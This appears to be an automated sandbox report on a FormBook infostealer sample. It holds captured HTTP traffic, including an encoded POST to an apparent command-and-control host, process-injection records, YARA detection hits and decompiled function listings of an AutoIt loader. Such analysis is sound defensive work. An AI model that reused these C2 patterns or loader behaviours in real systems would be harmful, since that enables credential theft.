33^d<'.vnkmz<=pb;_@&+MiigwoT4[~\|YQ{XvUwxNubY0pa'Ly&\|>Q;,}wlb,[\G5.vZ\|
Jul 25, 2024 12:10:37.646545887 CEST	1236	IN	Data Raw: 9b c6 d1 09 13 ea 74 6a 3d 7e 60 85 a7 dd 2e 02 3d 8f f9 dc 33 d8 81 55 02 9f b9 c7 f8 ee b5 ce a0 b8 eb c0 ea 80 e1 8d aa d1 84 db 86 87 8e 7a d0 33 b8 0b 05 0c 21 ff 39 3c 74 c4 89 bb 30 b3 03 c3 cf 38 88 71 64 f4 63 cf 85 93 c3 43 ff bd 93 0d Data Ascii: tj=~`.=3Uz3!9<t08qdcCAyZ8r02?rKBA~a?ZQvyq9QI?Nw5^%^=h5BeA\|n,n82vL&"F%OGbw
Jul 25, 2024 12:10:37.646564007 CEST	1236	IN	Data Raw: bc ab e0 41 1c 19 4d 9e a4 40 b7 dc 3d f6 ce 16 cc 01 ca 11 5a c9 d5 45 f5 4a f4 49 f0 39 49 95 bb c2 5f 21 94 c9 ec 0b 08 f9 c0 e2 23 92 52 a4 ea 33 92 0a de cf dd ab b3 59 99 a4 2a 57 53 25 7e fd ce 1a 49 25 6e 55 33 b9 7b 24 b5 b4 29 c5 49 aa Data Ascii: AM@=ZEJI9I_!#R3YWS%~I%nU3{$)I^zBRKTK\H\|c$fBBR:WWWIq)~6((}\|{B/d2\H*I)w1_fZ[gBp7T"J^OAI"P2cc]?gVaRb#z
Jul 25, 2024 12:10:37.647630930 CEST	597	IN	Data Raw: 88 b4 5f 70 cb 5b 91 cc a3 ac 76 d9 8b 44 e8 fc b7 6d 59 6c c3 5e eb 15 50 7c 2f 92 07 75 1d 97 ab 8d c0 82 ad 17 84 bb 4d 56 5c 56 32 ad 18 9b 8f 5c 6b 3c 85 f8 88 d0 54 64 e9 31 77 9b 66 c2 7c 69 2d 44 0a 42 6b a5 fc 88 e6 9b 3c 50 a2 4a 33 60 Data Ascii: _p[vDmYl^P\|/uMV\V2\k<Td1wf\|i-DBk<PJ3`N+K\rLk=AWK4{)^mbF6/.5Y6WYU6J94Hc&[Bxf=W:lFXHOiRj/JJA^!Q52$U~
Jul 25, 2024 12:10:37.851721048 CEST	1236	IN	Data Raw: 35 31 61 0d 0a bc 5c 6d 4f db 56 14 fe 4c a5 fe 87 28 9a 04 7c 68 42 58 d9 22 d6 65 9b f6 69 5f fb 0f 1c 3b 76 e2 d8 4e 62 3b 24 b6 b4 1f 43 83 ba b4 a8 6a 4a 88 32 63 87 d7 cc 79 83 38 2f 34 30 2a ba 75 74 43 68 dd da 0e 36 ba 22 a1 c9 4e 80 00 Data Ascii: 51a\mOVL(\|hBX"ei_;vNb;$CjJ2cy8/40utCh6"NT"9tss=^M[ay]o1O{F'};gV8i=]SX3:F&wG"Yt}Nu$zKskt=M
Jul 25, 2024 12:10:37.852324963 CEST	97	IN	Data Raw: a4 1f 5a 17 c0 f1 00 ca 3b c6 1d 4e 1c c1 02 df 30 4e 87 db ad b4 d7 37 f5 d3 e9 aa 52 7b 25 57 6c 7c 27 1d 0d e5 1e 95 7f 1f be 79 e3 db e1 cf ce a1 dd 62 3f 00 5e df 6a dc 78 2d 10 c1 04 fd ad 80 7e 14 e7 7f 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 Data Ascii: Z;N0N7R{%Wl\|'yb?^jx-~a(S0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	49757	104.21.25.75	80

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:39.573590994 CEST	1760	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.fwbkl.com Origin: http://www.fwbkl.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.fwbkl.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 53 6c 50 45 49 64 2b 51 62 73 49 4f 4c 35 77 2f 5a 58 6c 35 46 47 53 58 72 6c 53 4a 44 39 56 4f 5a 48 65 52 75 66 56 6d 45 6f 72 50 75 4e 71 79 52 63 4d 77 44 78 45 44 4c 45 39 6a 55 66 57 41 74 61 52 6e 36 62 6b 51 6f 4c 54 6f 6b 71 6a 6c 76 58 77 4f 64 66 59 69 69 6e 4c 55 43 2b 2b 74 49 7a 73 68 6c 52 71 45 47 30 64 42 76 77 71 6f 47 30 45 4b 33 6c 34 6a 45 5a 69 36 73 46 4e 35 4f 4c 62 65 42 45 66 47 46 57 6f 66 34 46 59 32 55 4a 35 48 68 58 55 64 48 6c 41 33 68 49 6d 65 79 4b 37 32 6a 6b 61 32 6f 6d 44 6c 63 36 79 6b 68 5a 70 72 31 4d 56 65 6c 69 2f 46 54 36 67 74 5a 52 71 4e 2b 31 38 6b 59 62 78 6f 7a 6e 75 51 73 65 4a 4f 45 4d 30 76 72 38 31 2f 41 75 39 31 6b 48 54 39 39 68 74 34 38 39 30 67 70 46 4e 72 73 71 74 56 43 71 6d 77 4f 69 34 64 68 54 36 57 38 78 62 48 54 69 68 42 6e 70 33 64 31 75 52 4b 72 69 50 70 37 32 55 35 4a 48 78 41 41 46 4e 33 74 65 48 6c 64 63 77 47 35 4b 30 78 75 6e 63 73 42 74 4c 72 2f 41 47 34 6a 4d 39 66 6c 46 39 64 57 72 68 71 41 51 70 77 76 59 72 50 58 [TRUNCATED] Data Ascii: 7b7D=SlPEId+QbsIOL5w/ZXl5FGSXrlSJD9VOZHeRufVmEorPuNqyRcMwDxEDLE9jUfWAtaRn6bkQoLTokqjlvXwOdfYiinLUC++tIzshlRqEG0dBvwqoG0EK3l4jEZi6sFN5OLbeBEfGFWof4FY2UJ5HhXUdHlA3hImeyK72jka2omDlc6ykhZpr1MVeli/FT6gtZRqN+18kYbxoznuQseJOEM0vr81/Au91kHT99ht4890gpFNrsqtVCqmwOi4dhT6W8xbHTihBnp3d1uRKriPp72U5JHxAAFN3teHldcwG5K0xuncsBtLr/AG4jM9flF9dWrhqAQpwvYrPXck2AERtuU2N7uhJBfSy2p4rf0Y+RDUH5wcNU9uUpz6EnxMczsMDgcx9K2/P2NUk1ymAgtNCx0isDVwOrqM7zxxPsTKRMkOO6MK44n8/gFjnBPFf1UkizSglGKSwRxSBCV4Dbv7X3kUTdYOobrRkykMvMpSWtKmvcRk8VucgqADbQzEH1Ct3ZVJhEVwq12Pvxva814TeqcwuJfakOGOfSWFdpUD5m64sXuHb6Lt6RYStjyR/aUfC3iT/f/F7CUbLltdSdpO6phmyuHe8TNUgDNolcbOETy30Hw7jxrMZYZHeYPil/boOT1G7jWunSCOO+Qwjr6hvAUvsUIXp8WuXnlFPusq91h1LielqWGTfoR1sMnNGQkkcooMDVHGc59reE6IFj5X+w+6LN6uE0fEPSYW3uho9oBd2qb6RPpE5KCm3fRwv6yGyE8+gDtxIzW+P9j3vp4d8UNitYwIlLNwHJyTnPK9em53diwk8qLDX8mpXOg4PKrDDtZtSnoqcjVLJth600BXfPMgTMpzpkNEd5+/PBRFqBp/Thx2v6+M36QIpucCngsAKoCFSNgSN7vggWfqPHanP84plRc9s2/tS2uJ8bxTg9YPQfwuv1ndIKyhvdLn3nDyzJ2EKfT7iS722voD6zUng9CGKtmIu7mv7zDk/AUbk0HV+yy2 [TRUNCATED]
Jul 25, 2024 12:10:40.568747044 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 10:10:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private Vary: Accept-Encoding Set-Cookie: ASPSESSIONIDQARRRDQQ=GCPMJJNAGOJMNEMNFLLALADB; path=/ X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J6cdtYGSyNNs9elOw1bHMxgeeIispD6PN5vB9Gc653K%2F3FNNxI0lx2pscRxwYsdr%2F4G556T7X7xTQWws9tcNLDxZgAzeRhqovhyR9Iq6YBQMZb6osyX9tnjlUM%2BG625"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8b5c882bde72b3-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 65 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b eb 73 da 58 96 ff 1c 57 f9 7f d0 b0 55 d3 55 33 26 c4 4e fa 31 0e 66 2a eb 99 da 9d aa e9 da a9 9a 99 aa d9 4f 5d 32 56 82 2a 18 58 90 f3 e8 dd fd 63 24 d1 36 71 94 84 97 00 21 61 c0 3c 0c 02 81 40 20 d2 ee 4e e2 74 32 71 d2 71 7a ba f3 58 7b 98 24 b5 75 24 64 fc 8a 93 4e b2 1f f0 b6 5d e8 9e 7b ef b9 e7 de 73 ee ef 9e fb 92 86 87 ac 3f fb cd bf 4d fe e9 df ff f0 5b c4 41 cc 38 6d c3 43 56 2d b4 3a 30 74 1a 62 33 18 81 22 0e 82 f0 98 b1 ff 98 c5 cf 4d 98 ec 6e 17 81 b9 08 33 71 d1 83 99 90 5e 6c c2 44 60 17 08 0b 14 3d 89 d8 1d a8 d7 87 11 13 67 a6 ce 9a b6 44 18 89 a6 5e ea 7e a2 ff 62 fe f3 29 f3 a4 7b c6 83 12 f8 94 73 bb f4 df fd 76 62 74 74 04 9e c7 e0 f9 2b 78 7c d2 17 ee 42 67 b0 09 d3 39 1c 3b ef 71 7b 89 6d e5 ce e3 d3 84 63 62 1a 3b 87 db 31 b3 16 19 41 70 17 4e e0 a8 d3 ec b3 a3 4e 6c 62 f4 e8 b1 11 64 d6 87 79 b5 38 3a e5 c4 26 8e 8d 20 33 b8 0b 9f 99 9d d9 ce 33 83 5e d8 99 64 da d7 3c 93 a8 dd 81 99 27 dd 2e c2 eb 76 6e 6b 89 cb 6d f6 [TRUNCATED] Data Ascii: e00[sXWUU3&N1fO]2VXc$6q!a<@ Nt2qqzX{$u$dN]{s?M[A8mCV-:0tb3"Mn3q^lD`=gD^~b){svbtt+x\|Bg9;q{mcb;1ApNNlbdy8:& 33^d<'.vnkmz<=pb;_@&+MiigwoT4[~\|YQ{XvUwxNubY0pa'Ly&\|>Q;,}wlb,[\G5.vZ\|
Jul 25, 2024 12:10:40.569288969 CEST	1236	IN	Data Raw: 9b c6 d1 09 13 ea 74 6a 3d 7e 60 85 a7 dd 2e 02 3d 8f f9 dc 33 d8 81 55 02 9f b9 c7 f8 ee b5 ce a0 b8 eb c0 ea 80 e1 8d aa d1 84 db 86 87 8e 7a d0 33 b8 0b 05 0c 21 ff 39 3c 74 c4 89 bb 30 b3 03 c3 cf 38 88 71 64 f4 63 cf 85 93 c3 43 ff bd 93 0d Data Ascii: tj=~`.=3Uz3!9<t08qdcCAyZ8r02?rKBA~a?ZQvyq9QI?Nw5^%^=h5BeA\|n,n82vL&"F%OGbw
Jul 25, 2024 12:10:40.569300890 CEST	1236	IN	Data Raw: bc ab e0 41 1c 19 4d 9e a4 40 b7 dc 3d f6 ce 16 cc 01 ca 11 5a c9 d5 45 f5 4a f4 49 f0 39 49 95 bb c2 5f 21 94 c9 ec 0b 08 f9 c0 e2 23 92 52 a4 ea 33 92 0a de cf dd ab b3 59 99 a4 2a 57 53 25 7e fd ce 1a 49 25 6e 55 33 b9 7b 24 b5 b4 29 c5 49 aa Data Ascii: AM@=ZEJI9I_!#R3YWS%~I%nU3{$)I^zBRKTK\H\|c$fBBR:WWWIq)~6((}\|{B/d2\H*I)w1_fZ[gBp7T"J^OAI"P2cc]?gVaRb#z
Jul 25, 2024 12:10:40.571445942 CEST	597	IN	Data Raw: 88 b4 5f 70 cb 5b 91 cc a3 ac 76 d9 8b 44 e8 fc b7 6d 59 6c c3 5e eb 15 50 7c 2f 92 07 75 1d 97 ab 8d c0 82 ad 17 84 bb 4d 56 5c 56 32 ad 18 9b 8f 5c 6b 3c 85 f8 88 d0 54 64 e9 31 77 9b 66 c2 7c 69 2d 44 0a 42 6b a5 fc 88 e6 9b 3c 50 a2 4a 33 60 Data Ascii: _p[vDmYl^P\|/uMV\V2\k<Td1wf\|i-DBk<PJ3`N+K\rLk=AWK4{)^mbF6/.5Y6WYU6J94Hc&[Bxf=W:lFXHOiRj/JJA^!Q52$U~
Jul 25, 2024 12:10:40.813386917 CEST	1236	IN	Data Raw: 35 31 61 0d 0a bc 5c 6d 4f db 56 14 fe 4c a5 fe 87 28 9a 04 7c 68 42 58 d9 22 d6 65 9b f6 69 5f fb 0f 1c 3b 76 e2 d8 4e 62 3b 24 b6 b4 1f 43 83 ba b4 a8 6a 4a 88 32 63 87 d7 cc 79 83 38 2f 34 30 2a ba 75 74 43 68 dd da 0e 36 ba 22 a1 c9 4e 80 00 Data Ascii: 51a\mOVL(\|hBX"ei_;vNb;$CjJ2cy8/40utCh6"NT"9tss=^M[ay]o1O{F'};gV8i=]SX3:F&wG"Yt}Nu$zKskt=M
Jul 25, 2024 12:10:40.813673019 CEST	97	IN	Data Raw: a4 1f 5a 17 c0 f1 00 ca 3b c6 1d 4e 1c c1 02 df 30 4e 87 db ad b4 d7 37 f5 d3 e9 aa 52 7b 25 57 6c 7c 27 1d 0d e5 1e 95 7f 1f be 79 e3 db e1 cf ce a1 dd 62 3f 00 5e df 6a dc 78 2d 10 c1 04 fd ad 80 7e 14 e7 7f 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 Data Ascii: Z;N0N7R{%Wl\|'yb?^jx-~a(S0

Target ID:	0
Start time:	06:06:30
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002B_466.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_466.exe"
Imagebase:	0xe20000
File size:	1'161'737 bytes
MD5 hash:	CC75546DCA8931513952D924791B54F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:06:32
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_466.exe"
Imagebase:	0x2b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:06:41
Start date:	25/07/2024
Path:	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe"
Imagebase:	0xa60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:06:43
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\DevicePairingWizard.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\DevicePairingWizard.exe"
Imagebase:	0xba0000
File size:	83'968 bytes
MD5 hash:	2A4C038870FD0083037A7B07FEAAEDE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:06:57
Start date:	25/07/2024
Path:	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe"
Imagebase:	0xa60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:07:13
Start date:	25/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 00E23B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E23B7A
IsDebuggerPresent.KERNEL32 ref: 00E23B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00EE62F8,00EE62E0,?,?), ref: 00E23BFD

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

Part of subcall function 00E30A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E23C26,00EE62F8,?,?,?), ref: 00E30ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00E23C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00ED93F0,00000010), ref: 00E5D4BC
SetCurrentDirectoryW.KERNEL32(?,00EE62F8,?,?,?), ref: 00E5D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00ED5D40,00EE62F8,?,?,?), ref: 00E5D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00E5D581

Part of subcall function 00E23A58: GetSysColorBrush.USER32(0000000F), ref: 00E23A62
Part of subcall function 00E23A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E23A71
Part of subcall function 00E23A58: LoadIconW.USER32(00000063), ref: 00E23A88
Part of subcall function 00E23A58: LoadIconW.USER32(000000A4), ref: 00E23A9A
Part of subcall function 00E23A58: LoadIconW.USER32(000000A2), ref: 00E23AAC
Part of subcall function 00E23A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E23AD2
Part of subcall function 00E23A58: RegisterClassExW.USER32(?), ref: 00E23B28

Part of subcall function 00E239E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E23A15
Part of subcall function 00E239E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E23A36
Part of subcall function 00E239E7: ShowWindow.USER32(00000000,?,?), ref: 00E23A4A
Part of subcall function 00E239E7: ShowWindow.USER32(00000000,?,?), ref: 00E23A53

Part of subcall function 00E243DB: _memset.LIBCMT ref: 00E24401
Part of subcall function 00E243DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E244A6

Strings

%, xrefs: 00E23C56
This is a third-party compiled AutoIt script., xrefs: 00E5D4B4
runas, xrefs: 00E5D575

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%
API String ID: 529118366-3343222573
Opcode ID: 5d53ad361542253d23ad3fb8b40893c1187618bfbfa36c04aa1096b6511db155
Instruction ID: 60bf630060e975f58a082d897e61051233ad99179b4bab996da907d7dca5449a
Opcode Fuzzy Hash: 5d53ad361542253d23ad3fb8b40893c1187618bfbfa36c04aa1096b6511db155
Instruction Fuzzy Hash: 2951377090829CAECF11EBF1FC46EEDBBB8AB19344B006165F951761B2DA745A09CB21

Function 00E24FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E24EEE,?,?,00000000,00000000), ref: 00E24FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E24EEE,?,?,00000000,00000000), ref: 00E25010
LoadResource.KERNEL32(?,00000000,?,?,00E24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E24F8F), ref: 00E5DD60
SizeofResource.KERNEL32(?,00000000,?,?,00E24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E24F8F), ref: 00E5DD75
LockResource.KERNEL32(N,?,?,00E24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E24F8F,00000000), ref: 00E5DD88

Strings

N, xrefs: 00E5DD85
SCRIPT, xrefs: 00E25006

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT$N
API String ID: 3051347437-3852340653
Opcode ID: ca58d770094d496c2103d99eaa2aaf24bf0b12bc27994c9209b03999624b5d34
Instruction ID: 26ae3658dd50a258f67ebe980b3959067ba230121c631460d6bbd63763891b62
Opcode Fuzzy Hash: ca58d770094d496c2103d99eaa2aaf24bf0b12bc27994c9209b03999624b5d34
Instruction Fuzzy Hash: 8F117C75240700BFD7218BA6EC58F677BB9EBCAB11F20466CF406E6260DB71EC0486B0

Function 00E24AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E24B2B

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

GetCurrentProcess.KERNEL32(?,00EAFAEC,00000000,00000000,?), ref: 00E24BF8
IsWow64Process.KERNEL32(00000000), ref: 00E24BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E24C45
FreeLibrary.KERNEL32(00000000), ref: 00E24C50
GetSystemInfo.KERNEL32(00000000), ref: 00E24C81
GetSystemInfo.KERNEL32(00000000), ref: 00E24C8D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: dee866d169e4b115389e89db9197930f8bc568e35c70c8a5b6c3a180f1373bc7
Instruction ID: f08164859b6f82ef4a53b1fefb0990c694362712df3ea1c766fb2355dfc2d12a
Opcode Fuzzy Hash: dee866d169e4b115389e89db9197930f8bc568e35c70c8a5b6c3a180f1373bc7
Instruction Fuzzy Hash: CC91E57154EBD4DEC732CB6894511AAFFE4AF2A304B445D9EE4CBA3A41D220F90CC759

Function 00E2E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dt, xrefs: 00E63F1F
Dt, xrefs: 00E2EC21
Dt, xrefs: 00E2EC1A
Variable must be of type 'Object'., xrefs: 00E6428C
Dt, xrefs: 00E63F58

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
API String ID: 0-3952547859
Opcode ID: 71ffce115388031224f180d0e8614cd89bd67139bcd98ffafe469025029feb5c
Instruction ID: f3080dad81c9572c0d86a8d67c094734c16958a6eed2a9d673803f0661b8c022
Opcode Fuzzy Hash: 71ffce115388031224f180d0e8614cd89bd67139bcd98ffafe469025029feb5c
Instruction Fuzzy Hash: C3A29F75A04225CFCB24CF54E481AAEB7B1FF58304F24A069E956BB351D730ED86CB91

Function 00E84696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

